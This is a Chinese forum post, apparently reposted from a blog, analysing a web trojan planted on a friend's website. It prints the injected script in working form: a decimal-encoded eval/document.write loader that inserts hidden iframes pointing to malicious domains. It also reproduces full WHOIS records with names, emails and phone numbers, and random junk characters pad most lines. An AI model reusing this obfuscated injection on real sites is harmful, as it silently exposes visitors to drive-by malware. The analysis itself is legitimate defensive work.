[原创]一篇刚写的分析木马手记

首发在我的博客里面， W6pS.}  
\vI_%su1N  
http://www.areway.cn/?p=175 ^JTfRZ:a  
%UmE=V  
bnlL-]]9z  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： R~`Y6>o~9:  
          gVGq  
<script>t=’60,105,102,114,97,109,101, G 6][@q  
32,115,114,99,61,104,116,116,112,58,47,47, z#y<QH  
102,114,101,101,46,117,45,117,117,117,46,99, hm&~6rB  
110,47,101,114,114,111,114,46,104,116,109, ZrTq)BZ  
32,119,105,100,116,104,61,49,48,48,32,104, /<mc~S7  
101,105,103,104,116,61,48,62,60,47,105,102, ?F-,4Ox{/  
114,97,109,101,62′; [-l^,,E  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> Uc4r  
                                                                                                  J(Bn  n  
<script>t=’60,105,102,114,97,109,101,32,115, '&"7(8E} *  
114,99,61,104,116,116,112,58,47,47,102,114, V#=N?p  
101,101,46,117,45,117,117,117,46,99,110,47, T/H*Bo*=5  
101,114,114,111,114,46,104,116,109,32,119, .m<-)Kx  
105,100,116,104,61,49,48,48,32,104,101,105, BjA|H  
103,104,116,61,48,62,60,47,105,102,114,97, !%Ak15o  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); IflpM]  
document.write(t);</script> /fX]Yu  
                                                                                                  $1axZ~8sS  
<html xmlns=” O @w=  
http://www.w3.org/1999/xhtml H:|yu  
“> /(q*  
<head> 2]@U$E='s  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> z >pq<}R6  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> U9JqZ!  
<title>首页 - 爱生活家庭网 m_pK'jc  
                                                                                                                                                    b^v.FK46G  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 LE7o[<>  
转换字符串后的大概内容是（谁点击后果自付）： MFC= oKD  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… (F @IUbnl  
                                                                                                                                 
8}U/fQ~  
查询玉米u-uuu.cn的详细信息： ^0r@",  
Domain Name: u-uuu.cn 
e@6}?q;  
ROID: 20070901s10001s64972306-cn &P\T{d2"  
Domain Status: ok 9Vp$A$7M  
Registrant Organization: 王雷 }>grGr%oR  
Registrant Name: 王雷 pD){K  
Administrative Email: czlovexs@126.com dZZ
Hk  
Sponsoring Registrar: 北京万网志成科技有限公司 &B))3WFy  
Name Server:ns.yovole.com 
=14pEe  
Name Server:ns1.yovole.com =~R0
U  
Registration Date: 2007-09-01 17:54 oL<^m?-u  
Expiration Date: 2008-09-01 17:54 &R 0BuFL8  
最后PING了一下地址 都没有什么…. QII>XJ9  
                                                                                                5bgx;z9  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. l!`m}$  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> c0tv!PSw  
<script language=”javascript” src=” uz%rWN`{  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script &)rm
v  
> 3iY`kf  
这个玉米应该有可能是木马作者的： Z!*Wn`d-k  
foafau.info的详细信息： W{k}ogI;  
Access to INFO WHOIS information is provided to assist persons in %cBJ haR{(  
determining the contents of a domain name registration record in the -1fT2e  
Afilias registry database. The data in this record is provided by ,\Cy'TSz  
Afilias Limited for informational purposes only, and Afilias does not 6n>+cX>E  
guarantee its accuracy.  This service is intended only for query-based kg_
TXB  
access. You agree that you will use this data only for lawful purposes Z{%h6""  
and that, under no circumstances will you use this data to: (a) allow, |`,%%p|T%  
enable, or otherwise support the transmission by e-mail, telephone, or Zu5`-[mw  
facsimile of mass unsolicited, commercial advertising or solicitations OYe @P  
to entities other than the data recipient’s own existing customers; or +|^rz#X  
(b) enable high volume, automated, electronic processes that send dD#A.C,Rz  
queries or data to the systems of Registry Operator, a Registrar, or S]k<Ixvf  
Afilias except as reasonably necessary to register domain names or ETYw  
modify existing registrations. All rights reserved. Afilias reserves O%rjY  
the right to modify these terms at any time. By submitting this query, *`|F?wF  
you agree to abide by this policy. XWK A0  
Domain ID:D22418703-LRMS 1,Y-_e)  
Domain Name:FOAFAU.INFO (d@lG*K  
Created On:20-Nov-2007 16:05:42 UTC s$mcIMqs  
Last Updated On:20-Nov-2007 16:05:44 UTC c\n\gQ:LQ  
Expiration Date:20-Nov-2008 16:05:42 UTC `2{x8A  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) tM~R?9OaJ  
Status:CLIENT DELETE PROHIBITED K4y4!zz  
Status:CLIENT RENEW PROHIBITED `^RpT]S  
Status:CLIENT TRANSFER PROHIBITED {gzL}KL  
Status:CLIENT UPDATE PROHIBITED EWbFy"=  
Status:TRANSFER PROHIBITED xa
ejG/'iK  
Registrant ID:GODA-040110615 7QzUw  
Registrant Name:liu hong SeKU?\  
Registrant Organization: !5pnl0DK*  
Registrant Street1:beijing j:rGFd  
Registrant Street2: $ -;,O8yR  
Registrant Street3: `j@2[XdHu  
Registrant City:beijing ij/ |~-!  
Registrant State/Province: kAU[lPt*R  
Registrant Postal Code:100000 U^[<G6<9]  
Registrant Country:CN 7?e
*b(vd  
Registrant Phone:+86.860108888777 vWwp'q  
Registrant Phone Ext.: e;!si>N  
Registrant FAX: uTngDk  
Registrant FAX Ext.: (J5E]NV  
Registrant Email:bbbshiji@163.com *uNa(yd  
Admin ID:GODA-240110615 S$ dFz  
Admin Name:liu hong W$ M4#  
Admin Organization: 
#\Lt0  
Admin Street1:beijing sFMSH:5z  
Admin Street2: Wcw$ Zv  
Admin Street3: _z~|*7@  
Admin City:beijing A@+pv
C&  
Admin State/Province: rD fUTfv|Q  
Admin Postal Code:100000 ~gmj/PQ0  
Admin Country:CN ^lf{IM-Y  
Admin Phone:+86.860108888777 Wfz&:J#  
Admin Phone Ext.: e%SQ~n=H 9  
Admin FAX: pGzzv{H  
Admin FAX Ext.: ,{=#
  
Admin Email:bbbshiji@163.com
fC52nK&T8  
Billing ID:GODA-340110615 3 rV)
JA  
Billing Name:liu hong /{^Qup  
Billing Organization: WL+
I)n8~  
Billing Street1:beijing NO8)XJ3s  
Billing Street2: 
_5y3<H<?  
Billing Street3: z\{y[3-  
Billing City:beijing `VwZDU~6  
Billing State/Province: i_Ab0vye  
Billing Postal Code:100000 7vubkj&  
Billing Country:CN K#kU6/  
Billing Phone:+86.860108888777 QVsOB$  
Billing Phone Ext.: C65( m  
Billing FAX: q0&g.=;  
Billing FAX Ext.: +g>)Bur  
Billing Email:bbbshiji@163.com Rra<MOR  
Tech ID:GODA-140110615 
".Luc7  
Tech Name:liu hong C0Z mv  
Tech Organization: =E,^ +`M  
Tech Street1:beijing >S,yqKp37~  
Tech Street2: GMyzQ]@}  
Tech Street3: n3-5`Jti  
Tech City:beijing V*"-@  
Tech State/Province: :'|%~&J  
Tech Postal Code:100000 l`M{Ravvn*  
Tech Country:CN Cj#$WZga%  
Tech Phone:+86.860108888777 |gg6|,Bt4  
Tech Phone Ext.: gDa}8!+i  
Tech FAX: =`Pgo5A  
Tech FAX Ext.: ,C1}gPQ6<  
Tech Email:bbbshiji@163.com |>Qj]  
Name Server:NS27.DOMAINCONTROL.COM 1/:WA:]1,  
Name Server:NS28.DOMAINCONTROL.COM buu~#m1z  
Name Server: 0[/>> !ws  
Name Server: 9(V12gn+lk  
Name Server: }4b 4<Sm_h  
Name Server: a6cq0g[#z  
Name Server: 2x<,R/}  
Name Server: e3oHe1"hP  
Name Server: SvLI%>B
=9  
Name Server: >08'+\~:b  
Name Server: -<h4I aM  
Name Server: %F_)!M;x  
Name Server: F<39eDNpz  
                                                                                                          ^{lcj  
接着下载每个文件里面的代码： @8{-B;  
一步一步看.. V(3^ev/  
Cdg/wRje  
e:D8.h+&}  
*")Req  
[|.IXdJ!  
<[Oe.0SGu  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

看过了就是没看懂。。。

要是有全部 就好了 传上来